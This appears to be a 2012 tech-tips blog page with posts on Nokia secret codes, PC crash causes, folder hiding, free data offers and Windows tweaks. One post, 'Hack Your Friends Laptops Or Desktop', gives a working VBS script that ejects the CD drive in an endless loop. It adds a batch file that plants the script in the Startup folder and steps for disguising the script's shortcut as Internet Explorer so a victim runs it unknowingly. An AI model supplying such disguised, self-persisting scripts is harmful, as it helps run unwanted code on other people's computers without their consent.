Tuesday 31 July 2012

Make Money With Facebook Now


Find out how to Get Paid For Giving Away Free Stuff In Facebook! Get this free Facebook Free Money Report now and make money while doing what you do most, you wonder what that is? Now the solution is at you finger tips get this report now for free FREE FACEBOOK MONEY REPORT Please make sure you confirm your subscription from your mail before you proceed. Thank you...

Wednesday 25 July 2012

Nokia Secret Codes

Note: the codes might not work on your own Nokia phone simply because your phone might not support that features

To perform any task using these codes just type any of it on the main screen of your phone:

*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#

*#7328748263373738# resets security code.
Default security code is 12345


*#1471# Last call (Only Vodafone)

*#21# Allows you to check the number that "All Calls" are diverted to

*#30# Lets you see the private number

*#43# Allows you to check the "Call Waiting" status of your phone.

*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to

*#67# Allows you to check the number that "On Busy Calls" are diverted to

*#67705646# Removes operator logo on 3310 & 3330

*#73# Reset phone timers and game scores

*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible


*#7780# Restore factory settings

*#8110# Software version for the nokia 8110

*#92702689#

Displays - 1.Serial Number, 2.Date Made,
3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data

12345 This is the default security code

Hack Your Friends Laptops Or Desktop And Make Them Beg


Here will shall be using a VBS script that opens a CD drive every time found closed. To create this script open your  Notepad (any basic ANSI standard text editor) and copy the codes below into it and save as CDfun.vbs and do not forget the .vbs part


set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


Now your friends are in trouble but what if every time he/ she start his/her computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it
NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now to make your friends not to be suspicious. all you need to do is get them to somehow open this run.bat. there are many ways.one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer. Or you simply create a shortcut for the script and rename the shortcut to a program your friend will always open this can be done by the following steps:
  1. Right click on your desktop and scroll down to new
  2. Select new shortcut
  3. If a wizard pop up follow the steps given
  4. Or right click on the shortcut and click on properties
  5. Change the name to something like "internet Explorer" and also change the icon to that of internet Explorer
  6. So anytime your friend click on it, the CD drives will be open


How to stop This Thing???
open
task Manager > processes> wscript.exe
right click on it > end process tree.

happy hacking...

10 reasons why PC's crash


Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications." You have just been struck by the Blue Screen of Death. Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening? Here is a listing of the 10 major reasons computers crash:
  1. Hardware conflict The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device. For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself. If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route: * Start-Settings-Control Panel-System-Device Manager. Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it. Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it. Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty). When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity. To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.
  2. Bad Ram Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing. But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked. One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged. Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble. EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.
  3. BIOS settings Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up. Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to. A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display. Microsoft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).
  4. Hard disk drives After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to * Start-Programs-Accessories-System Tools-Disk Defragmenter This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler. The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop). Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimization. This can be adjusted by going to * Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk. Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space. Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to * Start-Programs-Accessories-System Tools-ScanDisk Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.
  5. Fatal OE exceptions and VXD errors Fatal OE exception errors and VXD errors are often caused by video card problems. These can often be resolved easily by reducing the resolution of the video display. Go to * Start-Settings-Control Panel-Display-Settings Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate. If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to * Start-Settings-Control Panel-System-Device Manager Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts. If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse. The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message. Another useful way to resolve video problems is to go to * Start-Settings-Control Panel-System-Performance-Graphics Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device). Look up your video card's manufacturer on the internet and search for the most recent drivers for it.
  6. Viruses Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to * Start-Settings-Control Panel-Add/Remove Programs Here, look for the Start Up Disk tab. Virus protection requires constant vigilance. A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer. An excellent antivirus program is Avast Antivirus, some others are McAfee VirusScan by Network Associates ( www.nai.com) and Norton AntiVirus 2000, made by Symantec ( www.symantec.com).
  7. Printers The action of sending a document to print creates a bigger file, often called a postscript file. Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance. If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.
  8. Software A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the program in the System Registry and leaves the way clear for a completely fresh copy. The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Download or purchase a good Reg cleaner, read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode. Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly. Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work. Remember to restore all the BIOS settings back to their former settings following installation.
  9. Overheating Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to. One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.
  10. Power supply problems With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut. If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut. It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.
  11. I hope you get this and find out what happened anytime your system crashes. See ya later

Tuesday 24 July 2012

How To Hide Folders Without Using Any Software

Many people want to secure their folders and content from intruders so that their files and documents can not be easily tempered with. The following simple steps will let you achieve that:
  1. Create a new folder: you can do that by right clicking on any free space on your desktop or any place on your hard disk .
  2. Rename the folder to a blank name: To do this, right click on the new folder you created, now hold down the "Alt" key then using the numeric key pad on the right of your keyboard, type "255". the folder will be named with blank characters.
  3. Hide the folder icon: again right click on the folder and select properties on the list displayed. On the properties window click on the customize tab then you will see an option, " change icon ", click on it. You should see different icons but we need a blank icon, scroll down the list and you will see some blank icons(always 3) select any of it and click on "apply" then click on "OK"..
  4. The last and most important thing is to keep your folder where you wont forget...
  5. Now you can hide your folders and its contents.

    Subscribe to our mailing list below to get updates and free reports or Join us using the "Join This Site" button on the right to comment.

Sunday 22 July 2012

Get Free 2GB Data Plan on Etisalat



Etisalat is at it again, this time they are giving away a freebie of 2048Megabyte data bundle which is equivalent as 2Gigabyte. All you've got to do is dial *229*5*2# on your mobile and get this free data plan, straight up. You can use this on all types of browsers in your mobile and its incredibly fast. It can also be used with your modem. Do this now and get online, FREE!!!!. Subscribe to our mailing list below to get more........

Wednesday 11 July 2012

The Windows Experience Index




First, what is the Windows Experience Index? According to the Windows Help manual, "The Windows Experience Index measures the capability of your computer's hardware and software configuration and expresses this measurement as a number called a base score. A higher base score generally means that your computer will perform better and faster than a computer with a lower base score, especially when performing more advanced and resource-intensive tasks." The Windows experience Index groups your computer's hardware and components and groups them into five namely:
  • Processor
  • Memory(Ram)
  • Graphics
  • Gaming graphics
  • and Primary hard disk


The Windows Experience Index accesses the key system components and rates them on a scale of 1.0 to 7.9. Your system rating is your lowest base score i.e after running the Windows Experience index, it will select the lowest base score and regard it as your system rating. To run the Windows Experience Index;
  1. Go to "My computer"
  2. Open System Properties and click on rating
  3. Or you could just type "Performance Information and tools" in the search bar on the start menu
  4. Now click on "Re-run the assessment" at the bottom right corner and wait for the assessment to finish


NOTE: This assessment can only be carried out when you computer is connected to a power outlet Bye.

Thursday 5 July 2012

How To Convert PDF Files To Word Documents



Another problem solved!!!! Do you have a .pdf file or document you would like to convert to a Microsoft word document i.e .doc? Either for editing sakes or for comfortability? If yes, then you've finally gotten an answer to your question and a solution to this problem. I have noticed that some people prefer reading from Word than from .pdf readers say Adobe. Nonetheless, the solution is here and it is called "PDF to DOC converter". This Windows software converts documents from their .pdf extension to a word document of .doc extension effectively and efficiently. I have used this software on countless occasions and i can testify to its work. It is easy to use and also adequately sized. All you have to is download the software to your PC here, install it and run it to convert your pdf files. 

Symbian Phones

Some people as I have noticed can not adequately distinguish between S60 i.e Symbian phones and S40 i.e Java Phones. So I’ve taken it up to myself to at least help in one way or the other.

Lets talk computer-wise now. Java phones are single-tasking phones that mostly can only do one thing at a time, less functions, use the application extension .jar and so much more. While on the other hand, Symbian phones are the multi-tasking, multi purposed ones. They can perform various tasks at once. Switch windows(you get what I mean) and are pretty fun to use. If you are interested in getting a Symbian phone, here is a list of some of them.

Nokia:
E5-00, E50, E51, E52, E55, E6, E60, E61, E62, E63, E65, E66, E7, E70, E71, E72, E73, E75, E90, N71, N73, N75, N76, N77, N78, N79, N8, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, 3250, 5228, 5230, 5235, 5250, 5320, 5500, 5530, 5630, 5700, 5730, 5800, 6110, 6120, 6124, 6210, 6220, 6290, 6650, 6710, 6720, 6730, 6760, 6788, 6790, X5, X6, X7, C5, C6, C7, Oro
Samsung:
SGH i400, i450, i520, i550, i560, G810, L870, I7110, i8510, i8910
LG:
JoY, KT610, KT770

Take care..

Monday 2 July 2012

How To change Windows Logon Screen in Windows





The Windows logon screen can be boring at times with the default picture like that above. Changing this background will add a really geeky feeling to your system. And you feel supercool when a friend or relative picks up your system and find this really cool feature.

To be able to do this, you need the software called “Logon Personalization”. Logon Personalization allows you to change the default background image of your logon screen. Download Logon personalization Here,extract it and run.




During Runtime, under the Logon screen tab, choose custom image and then browse for your desired image. Now click “Set Image”. To check out your new screen, press WinKey + L to view the locked screen with your new image.

Under the Logon options, you’ll be able to change the button style, add a startup message that comes up everytime you restart your system and also change the logon branding image. Download Now, and enjoy the cool features this application presents you.



See you guys later…
Related Posts Plugin for WordPress, Blogger...
 
Blogger Widgets Twitter Bird Gadget